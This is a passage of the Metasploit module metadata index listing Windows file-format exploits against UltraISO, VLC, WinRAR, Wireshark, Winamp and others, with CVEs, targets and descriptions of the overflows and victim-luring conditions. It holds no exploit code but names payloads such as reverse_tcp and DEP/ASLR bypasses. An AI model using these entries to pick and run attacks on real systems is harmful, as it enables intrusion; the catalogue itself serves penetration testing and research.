"description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CUE files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open a CUE file.\n\n NOTE: A file with the same base name, but the extension of \"bin\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.",
"references": [
"CVE-2007-2888",
"OSVDB-36570",
"BID-24140",
"EDB-3978"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows - UltraISO v8.6.2.2011 portable",
"Windows - UltraISO v8.6.0.1936"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ultraiso_cue.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ultraiso_cue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ursoft_w32dasm": {
"name": "URSoft W32Dasm Disassembler Function Buffer Overflow",
"full_name": "exploit/windows/fileformat/ursoft_w32dasm",
"rank": 400,
"disclosure_date": "2005-01-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in W32Dasm <= v8.93.\n By creating a malicious file and convincing a user to disassemble\n the file with a vulnerable version of W32Dasm, the Imports/Exports\n function is copied to the stack and arbitrary code may be executed\n locally as the user.",
"references": [
"CVE-2005-0308",
"OSVDB-13169",
"BID-12352",
"URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ursoft_w32dasm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/varicad_dwb": {
"name": "VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/varicad_dwb",
"rank": 500,
"disclosure_date": "2010-03-17",
"type": "exploit",
"author": [
"n00b",
"dookie",
"MC <mc@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n An attacker must send the file to the victim, and the victim must open the file.",
"references": [
"OSVDB-63067",
"BID-38815",
"EDB-11789"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/varicad_dwb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/videocharge_studio": {
"name": "VideoCharge Studio Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/videocharge_studio",
"rank": 300,
"disclosure_date": "2013-10-27",
"type": "exploit",
"author": [
"metacom",
"Andrew Smith",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n processing a specially crafted .VSC file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.",
"references": [
"OSVDB-69616",
"EBD-29234"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VideoCharge Studio 2.12.3.685"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/videocharge_studio.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/videocharge_studio",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/videolan_tivo": {
"name": "VideoLAN VLC TiVo Buffer Overflow",
"full_name": "exploit/windows/fileformat/videolan_tivo",
"rank": 400,
"disclosure_date": "2008-10-22",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n By creating a malicious TY file, a remote attacker could overflow a\n buffer and execute arbitrary code.",
"references": [
"CVE-2008-4654",
"OSVDB-49181",
"BID-31813"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VideoLAN VLC 0.9.4 (XP SP3 English)",
"VideoLAN VLC 0.9.2 (XP SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/videolan_tivo.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/videolan_tivo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/videospirit_visprj": {
"name": "VeryTools Video Spirit Pro",
"full_name": "exploit/windows/fileformat/videospirit_visprj",
"rank": 400,
"disclosure_date": "2011-04-11",
"type": "exploit",
"author": [
"Acidgen",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Video Spirit <= 1.70.\n When opening a malicious project file (.visprj), a stack buffer overflow occurs,\n resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"CVE-2011-0499",
"CVE-2011-0500",
"OSVDB-70619",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/videospirit_visprj.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/videospirit_visprj",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/visio_dxf_bof": {
"name": "Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability",
"full_name": "exploit/windows/fileformat/visio_dxf_bof",
"rank": 400,
"disclosure_date": "2010-05-04",
"type": "exploit",
"author": [
"Unknown",
"Shahin Ramezany <shahin@abysssec.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based overflow vulnerability in the handling\n of the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application\n is used to import a specially crafted DXF file, while parsing the HEADER section\n of the DXF file.\n\n To trigger the vulnerability an attacker must convince someone to insert a\n specially crafted DXF file into a new document by going to 'Insert' -> 'CAD Drawing'.",
"references": [
"CVE-2010-1681",
"OSVDB-64446",
"BID-39836",
"URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow",
"URL-https://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Visio 2002 English on Windows XP SP3 Spanish",
"Visio 2002 English on Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/visio_dxf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/visiwave_vwr_type": {
"name": "VisiWave VWR File Parsing Vulnerability",
"full_name": "exploit/windows/fileformat/visiwave_vwr_type",
"rank": 500,
"disclosure_date": "2011-05-20",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits a vulnerability found in VisiWave's Site Survey Report application.\n When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n 'Image'), but if a match isn't found, the function that's supposed to handle this routine\n ends up returning the input as a pointer, which is later used in a CALL DWORD PTR [EDX+10]\n instruction. This allows attackers to overwrite it with any arbitrary value, and results in code\n execution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n null if no match is found, and then it is validated before use.\n\n NOTE: During installation, the application will register two file handlers, VWS and VWR, which allows a\n victim user to 'double click' the malicious VWR file and execute code. This module was also built\n to bypass ASLR and DEP.",
"references": [
"CVE-2011-2386",
"OSVDB-72464",
"URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html",
"URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3/Windows 7 SP0"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/visiwave_vwr_type.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/visiwave_vwr_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_mkv": {
"name": "VLC Media Player MKV Use After Free",
"full_name": "exploit/windows/fileformat/vlc_mkv",
"rank": 500,
"disclosure_date": "2018-05-24",
"type": "exploit",
"author": [
"Eugene Ng - GovTech",
"Winston Ho - GovTech"
],
"description": "This module exploits a use after free vulnerability in\n VideoLAN VLC <= 2.2.8. The vulnerability exists in the parsing of\n MKV files and affects both 32-bit and 64-bit builds.\n\n In order to exploit this, this module will generate two files:\n The first .mkv file contains the main vulnerability and heap spray,\n the second .mkv file is required in order to take the vulnerable code\n path and should be placed under the same directory as the first .mkv file.\n\n This module has been tested against VLC v2.2.8. Tested with payloads\n windows/exec, windows/x64/exec, windows/shell/reverse_tcp,\n windows/x64/shell/reverse_tcp. Meterpreter payloads, if used, can\n cause the application to crash instead.",
"references": [
"CVE-2018-11529",
"URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11529",
"EDB-44979"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 2.2.8 on Windows 10 x86",
"VLC 2.2.8 on Windows 10 x64"
],
"mod_time": "2018-10-10 12:22:47 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_mkv.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_mkv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_modplug_s3m": {
"name": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/vlc_modplug_s3m",
"rank": 200,
"disclosure_date": "2011-04-07",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPolicy to\n permanently enable NX support on machines that support it. As such,\n this module is capable of bypassing DEP, but not ASLR.",
"references": [
"CVE-2011-1574",
"OSVDB-72143",
"URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b",
"URL-https://seclists.org/fulldisclosure/2011/Apr/113"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 1.1.8 on Windows XP SP3"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_modplug_s3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_realtext": {
"name": "VLC Media Player RealText Subtitle Overflow",
"full_name": "exploit/windows/fileformat/vlc_realtext",
"rank": 400,
"disclosure_date": "2008-11-05",
"type": "exploit",
"author": [
"Tobias Klein",
"SkD",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow vulnerability in\n VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\n RealText subtitle files.\n\n In order to exploit this, this module will generate two files:\n The .mp4 file is the decoy the victim is tricked into opening. The .rt file\n is the actual malicious file that triggers the vulnerability, which\n should be placed under the same directory as the .mp4 file.",
"references": [
"OSVDB-49809",
"CVE-2008-5036",
"BID-32125",
"URL-http://www.trapkit.de/advisories/TKADV2008-011.txt",
"URL-http://www.videolan.org/security/sa0810.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_realtext.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_realtext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_smb_uri": {
"name": "VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",
"full_name": "exploit/windows/fileformat/vlc_smb_uri",
"rank": 500,
"disclosure_date": "2009-06-24",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Win32AddConnection\n function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are\n reportedly affected.\n\n This vulnerability is only present in Win32 builds of VLC.\n\n This module was found to work with the windows/exec and\n windows/meterpreter/reverse_tcp payloads. However, the\n windows/meterpreter/reverse_ord_tcp was found not to work.",
"references": [
"BID-35500",
"OSVDB-55509",
"CVE-2009-2484",
"URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f",
"EDB-9029"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"vlc 0.9.9 on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_smb_uri.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_smb_uri",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vlc_webm": {
"name": "VideoLAN VLC MKV Memory Corruption",
"full_name": "exploit/windows/fileformat/vlc_webm",
"rank": 400,
"disclosure_date": "2011-01-31",
"type": "exploit",
"author": [
"Dan Rosenberg"
],
"description": "This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPolicy to\n permanently enable NX support on machines that support it.",
"references": [
"OSVDB-70698",
"CVE-2011-0531",
"BID-46060",
"URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456",
"URL-http://www.videolan.org/security/sa1102.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VLC 1.1.6 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_webm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_webm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vuplayer_cue": {
"name": "VUPlayer CUE Buffer Overflow",
"full_name": "exploit/windows/fileformat/vuplayer_cue",
"rank": 400,
"disclosure_date": "2009-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack based overflow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.",
"references": [
"OSVDB-64581",
"BID-33960"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VUPlayer 2.49"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vuplayer_cue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/vuplayer_m3u": {
"name": "VUPlayer M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/vuplayer_m3u",
"rank": 400,
"disclosure_date": "2009-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack overflow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted m3u file, a buffer is overwritten allowing\n for the execution of arbitrary code.",
"references": [
"CVE-2006-6251",
"OSVDB-31710"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VUPlayer 2.49"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vuplayer_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/watermark_master": {
"name": "Watermark Master Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/watermark_master",
"rank": 300,
"disclosure_date": "2013-11-01",
"type": "exploit",
"author": [
"metacom",
"Andrew Smith"
],
"description": "This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when\n processing a specially crafted .WCF file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Watermark Master to open a malicious .WCF file.",
"references": [
"OSVDB-99226",
"CVE-2013-6935",
"EDB-29327"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 x32 - Watermark Master 2.2.23",
"Windows 7 x64 - Watermark Master 2.2.23"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/watermark_master.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/watermark_master",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/winamp_maki_bof": {
"name": "Winamp MAKI Buffer Overflow",
"full_name": "exploit/windows/fileformat/winamp_maki_bof",
"rank": 300,
"disclosure_date": "2009-05-20",
"type": "exploit",
"author": [
"Monica Sojeong Hong",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in Winamp 5.55. The flaw\n exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,\n where memmove is used in an insecure way with user controlled data.\n\n To exploit the vulnerability the attacker must convince the victim to install the\n generated mcvcore.maki file in the \"scripts\" directory of the default \"Bento\" skin,\n or generate a new skin using the crafted mcvcore.maki file. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2009-1831",
"OSVDB-54902",
"BID-35052",
"EDB-8783",
"EDB-8772",
"EDB-8770",
"EDB-8767",
"URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winamp 5.55 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/winamp_maki_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winamp_maki_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/winrar_ace": {
"name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution",
"full_name": "exploit/windows/fileformat/winrar_ace",
"rank": 600,
"disclosure_date": "2019-02-05",
"type": "exploit",
"author": [
"Nadav Grossman",
"Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
],
"description": "In WinRAR versions prior to and including 5.61, there is a path traversal vulnerability\n when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename\n field is manipulated with specific patterns, the destination (extraction) folder is\n ignored, thus treating the filename as an absolute path. This module will attempt to\n extract a payload to the startup folder of the current user. The traversal is limited such that\n we can only go back one folder. Therefore, for this exploit to work properly, the user\n must extract the supplied RAR file from one folder within the user profile folder\n (e.g. Desktop or Downloads). A user restart (or re-logon) is required to gain a shell.",
"references": [
"CVE-2018-20250",
"EDB-46552",
"BID-106948",
"URL-https://research.checkpoint.com/extracting-code-execution-from-winrar/",
"URL-https://apidoc.roe.ch/acefile/latest/",
"URL-http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RARLAB WinRAR <= 5.61"
],
"mod_time": "2019-04-24 05:43:28 +0000",
"path": "/modules/exploits/windows/fileformat/winrar_ace.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winrar_ace",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/winrar_name_spoofing": {
"name": "WinRAR Filename Spoofing",
"full_name": "exploit/windows/fileformat/winrar_name_spoofing",
"rank": 600,
"disclosure_date": "2009-09-28",
"type": "exploit",
"author": [
"chr1x",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n when opening ZIP files. The file names shown in WinRAR when opening a ZIP file come from\n the central directory, but the file names used to extract and open contents come from the\n Local File Header. This inconsistency allows an attacker to spoof file names when opening ZIP files\n with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n March 2014.",
"references": [
"OSVDB-62610",
"BID-66383",
"URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html",
"URL-http://an7isec.blogspot.co.il/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winrar_name_spoofing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/wireshark_mpeg_overflow": {
"name": "Wireshark wiretap/mpeg.c Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/wireshark_mpeg_overflow",
"rank": 400,
"disclosure_date": "2014-03-20",
"type": "exploit",
"author": [
"Wesley Neelen",
"j0sm1"
],
"description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\n by generating a malicious file.",
"references": [
"CVE-2014-2299",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843",
"URL-http://www.wireshark.org/security/wnpa-sec-2014-04.html",
"BID-66066"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinXP SP3 Spanish (bypass DEP)",
"WinXP SP2/SP3 English (bypass DEP)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/wireshark_mpeg_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/wireshark_packet_dect": {
"name": "Wireshark packet-dect.c Stack Buffer Overflow (local)",
"full_name": "exploit/windows/fileformat/wireshark_packet_dect",
"rank": 400,
"disclosure_date": "2011-04-18",
"type": "exploit",
"author": [
"Paul Makowski",
"sickness",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4.\n When opening a malicious .pcap file in Wireshark, a stack buffer overflow occurs,\n resulting in arbitrary code execution.\n\n Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\")).",
"references": [
"CVE-2011-1591",
"OSVDB-71848",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836",
"EDB-17185"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win32 Universal (Generic DEP & ASLR Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/wireshark_packet_dect.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/wireshark_packet_dect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/wm_downloader_m3u": {
"name": "WM Downloader 3.1.2.2 Buffer Overflow",
"full_name": "exploit/windows/fileformat/wm_downloader_m3u",
"rank": 300,
"disclosure_date": "2010-07-28",
"type": "exploit",
"author": [
"fdisk",
"dookie"
],
"description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-66911",
"EDB-14497"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/wm_downloader_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/xenorate_xpl_bof": {
"name": "Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/xenorate_xpl_bof",
"rank": 500,
"disclosure_date": "2009-08-19",
"type": "exploit",
"author": [
"hack4love <hack4love@hotmail.com>",
"germaya_x",
"loneferret",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xenorate 2.50\n by creating a specially crafted xpl file.",
"references": [
"OSVDB-57162",
"EDB-10371"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 / SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xenorate_xpl_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/xion_m3u_sehbof": {
"name": "Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/xion_m3u_sehbof",
"rank": 500,
"disclosure_date": "2010-11-23",
"type": "exploit",
"author": [
"hadji samir <s-dz@hotmail.fr>",
"corelanc0d3r <peter.ve@corelan.be>",
"digital1",
"jduck <jduck@metasploit.com>",
"m_101"
],
"description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n 1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n contains an overly long string. This results in overwriting a\n structured exception handler record.",
"references": [
"OSVDB-66912",
"EDB-14517",
"EDB-14633",
"EDB-15598"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Xion Audio Player v1.0.126 XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xion_m3u_sehbof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/xradio_xrl_sehbof": {
"name": "xRadio 0.95b Buffer Overflow",
"full_name": "exploit/windows/fileformat/xradio_xrl_sehbof",
"rank": 300,
"disclosure_date": "2011-02-08",
"type": "exploit",
"author": [
"b0telh0 <me@gotgeek.com.br>"
],
"description": "This module exploits a buffer overflow in xRadio 0.95b.\n Using the application to import a specially crafted xrl file,\n a buffer overflow occurs allowing arbitrary code execution.",
"references": [
"CVE-2008-2789",
"BID-46290",
"EDB-16141"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/xradio_xrl_sehbof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/zahir_enterprise_plus_csv": {
"name": "Zahir Enterprise Plus 6 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/zahir_enterprise_plus_csv",
"rank": 300,
"disclosure_date": "2018-09-28",
"type": "exploit",
"author": [
"f3ci",
"modpr0be"
],
"description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.",
"references": [
"CVE-2018-17408",
"EDB-45505"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Zahir Enterprise Plus 6 <= build 10b"
],
"mod_time": "2018-10-04 10:10:09 +0000",
"path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/zahir_enterprise_plus_csv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/zinfaudioplayer221_pls": {
"name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow",
